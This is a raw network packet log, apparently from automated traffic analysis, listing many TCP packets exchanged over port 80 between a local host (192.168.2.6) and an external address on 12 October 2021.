Oct 12, 2021 12:35:38.747021914 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747025013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747054100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747054100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747078896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747104883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747106075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747164965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747191906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747200012 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747214079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747236967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747262001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747283936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747293949 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747307062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747328997 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747354031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747361898 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747375011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747395039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747400999 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747416973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747437954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747456074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747476101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747478962 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747497082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747519970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747543097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747548103 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747564077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747586966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747610092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747633934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747657061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747662067 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747679949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747705936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747730017 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747730970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747752905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747776031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747814894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747832060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747833967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747857094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747860909 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.747879982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747915030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747935057 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747952938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747968912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747984886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748003960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748013020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748023987 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748047113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748068094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748078108 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748087883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748110056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748132944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748136044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748155117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748177052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748195887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748204947 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748220921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748243093 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748264074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748272896 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748286009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748313904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748337984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748341084 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748368979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748389959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748411894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.748437881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.748780966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.774398088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774432898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774457932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774482012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774507046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774525881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.774529934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774550915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774573088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774593115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774605036 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.774614096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774635077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774656057 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774681091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774713039 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.774806023 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.774866104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774889946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774909019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774930954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774952888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774980068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.774983883 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775005102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775027037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775047064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775068045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775089025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775098085 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775110006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775167942 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775187969 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775198936 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775212049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775221109 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775234938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775254965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775278091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775283098 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775301933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775325060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775345087 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775353909 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775367022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775393009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775413990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775424004 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775434971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775455952 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775475979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775482893 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775496960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775517941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775543928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775552034 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775564909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775588036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775609016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.775618076 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.775636911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777090073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777142048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777169943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777175903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777193069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777216911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777234077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777246952 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777254105 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777275085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777295113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777312994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777328968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777333021 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777348042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777365923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777380943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777404070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777415991 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777420998 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777436018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777452946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777467966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777478933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777483940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777498960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777519941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777544022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777560949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777574062 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777575016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777590990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777607918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777631998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777662039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777667046 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777683973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777704954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777724981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777735949 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777741909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777757883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777780056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777802944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777812958 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777826071 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777844906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777868032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777878046 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777892113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777913094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777931929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777940989 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.777954102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777975082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.777992964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778016090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778023958 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778037071 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778059959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778084993 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778088093 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778107882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778129101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778148890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778162003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778167963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778187990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778208017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778230906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778255939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778280973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778285980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778301001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778321981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778326988 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778345108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778366089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778388023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778398037 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778409958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778433084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778455019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778465033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778477907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778502941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778523922 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778532982 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778547049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778568029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778577089 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778590918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778615952 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778636932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778644085 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778651953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778669119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.778693914 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.778764963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.792299032 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.792326927 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.800430059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800460100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800481081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800499916 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800625086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800647974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800674915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800693035 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.800699949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800719976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.800724983 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800750017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800774097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800786018 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.800797939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800816059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800834894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800847054 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.800858021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800880909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800904036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800914049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.800931931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800954103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800975084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.800992012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801009893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801014900 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.801022053 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.801032066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801059961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801081896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801098108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801119089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801126957 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.801139116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801157951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801177025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801193953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801208973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801219940 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.801230907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801251888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801263094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.801270008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801290035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.801335096 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.801466942 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.804758072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804792881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804815054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804836988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804860115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804876089 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.804882050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804907084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804929018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804949045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804955959 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.804972887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.804994106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805002928 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805016041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805038929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805059910 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805066109 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805085897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805114031 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805121899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805144072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805166006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805177927 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805188894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805210114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805231094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805242062 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805253029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805278063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805299997 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805305004 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805321932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805330992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805345058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805366993 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805387020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805403948 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805404902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805425882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.805434942 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.805448055 CEST	80	49749	195.133.18.140	192.168.2.6
